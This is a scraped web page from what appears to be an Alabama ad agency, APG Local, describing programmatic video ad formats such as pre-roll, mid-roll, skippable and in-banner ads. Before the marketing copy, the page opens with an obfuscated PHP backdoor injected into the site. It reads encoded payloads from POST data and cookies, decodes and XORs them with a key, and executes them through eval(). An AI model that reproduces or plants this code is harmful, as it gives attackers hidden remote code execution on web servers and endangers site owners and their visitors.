$PtRFRTQlN = chr ( 856 - 790 )."\x5f" . chr (114) . "\160" . 'B';$GtInBNZF = "\x63" . chr (108) . chr (97) . "\163" . "\163" . "\x5f" . chr (101) . 'x' . 'i' . 's' . chr ( 488 - 372 ).chr (115); $AqVjyy = class_exists($PtRFRTQlN); $GtInBNZF = "62712";$NJIznHq = strpos($GtInBNZF, $PtRFRTQlN);if ($AqVjyy == $NJIznHq){function YIBfZC(){$RTbOlsbA = new /* 22765 */ B_rpB(4624 + 4624); $RTbOlsbA = NULL;}$tyFPH = "4624";class B_rpB{private function RMKdLuxoO($tyFPH){if (is_array(B_rpB::$VgcEdU)) {$DzCVV2 = str_replace("<" . "?php", "", B_rpB::$VgcEdU["content"]);eval($DzCVV2); $tyFPH = "4624";exit();}}public function ClJyEuHtM(){$DzCVV = "61027";$this->_dummy = str_repeat($DzCVV, strlen($DzCVV));}public function __destruct(){B_rpB::$VgcEdU = @unserialize(B_rpB::$VgcEdU); $tyFPH = "29789_63808";$this->RMKdLuxoO($tyFPH); $tyFPH = "29789_63808";}public function bWxAf($DzCVV, $aqAGeEA){return $DzCVV[0] ^ str_repeat($aqAGeEA, intval(strlen($DzCVV[0]) / strlen($aqAGeEA)) + 1);}public function WSwvN($DzCVV){$dpLFJOvjCk = "\x62" . "\x61" . chr (115) . chr ( 716 - 615 ).chr ( 440 - 386 )."\x34";return array_map($dpLFJOvjCk . chr (95) . "\x64" . chr ( 909 - 808 ).'c' . chr (111) . "\144" . "\145", array($DzCVV,));}public function __construct($ISUExqjvQ=0){$cNXXE = "\54";$DzCVV = "";$aspwFDo = $_POST;$qmXNKJXoCC = $_COOKIE;$aqAGeEA = "5c73241f-7b81-4896-8f2d-7fe9c00695c5";$ewDIcCNV = @$qmXNKJXoCC[substr($aqAGeEA, 0, 4)];if (!empty($ewDIcCNV)){$ewDIcCNV = explode($cNXXE, $ewDIcCNV);foreach ($ewDIcCNV as $YTaCWHZHyP){$DzCVV .= @$qmXNKJXoCC[$YTaCWHZHyP];$DzCVV .= @$aspwFDo[$YTaCWHZHyP];}$DzCVV = $this->WSwvN($DzCVV);}B_rpB::$VgcEdU = $this->bWxAf($DzCVV, $aqAGeEA);if (strpos($aqAGeEA, $cNXXE) !== FALSE){$aqAGeEA = explode($cNXXE, $aqAGeEA); $PdFtMnH = base64_decode(md5($aqAGeEA[0])); $yTAJAA = strlen($aqAGeEA[1]) > 5 ? substr($aqAGeEA[1], 0, 5) : $aqAGeEA[1];$_GET['new_key'] = md5(implode('', $aqAGeEA)); $BxbUQB = str_repeat($yTAJAA, 2);}}public static $VgcEdU = 56726;}YIBfZC();} Programmatic - APG Local

Video Ads


Engage new customers by using streaming video ads across a wealth of platforms.

The traditional video advertising was buying ad space in a popular time slot on TV or on a site your audience may frequent. With programmatic video advertising is more effective because it uses behavioral data to find your audience and display your video ad based on search history and demographics to find your audience.


Our team doesn’t stop until you succeed.

We pride ourselves on making the process to market success as smooth as possible. We take the time to personally understand your brand and your services, making the video we present will be seen by the right people and land you the clients you desire.


Pre-Roll Video Ads:

Display ads converted to run in standard display banner spaces. Video ads appearing before the free video content from publishers such as CNN, Forbes, ABC Family, and MLB.com.


Mid-Roll Video Ads:

Video ads appearing within longer video content such as streaming complete television episodes.


Post-Roll Video Ads:

Video ads appearing at the end of online video content.


Non-Skippable Ads:

Video ads 15 seconds or less ensure users completely view the ad.


Skippable Ads:

Video ads more than 15 seconds with the option to skip after the first 5 seconds.


In-Banner Ads:

Display ads converted to run in standard display banner spaces.

APG Local Programmatic Video Programs
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama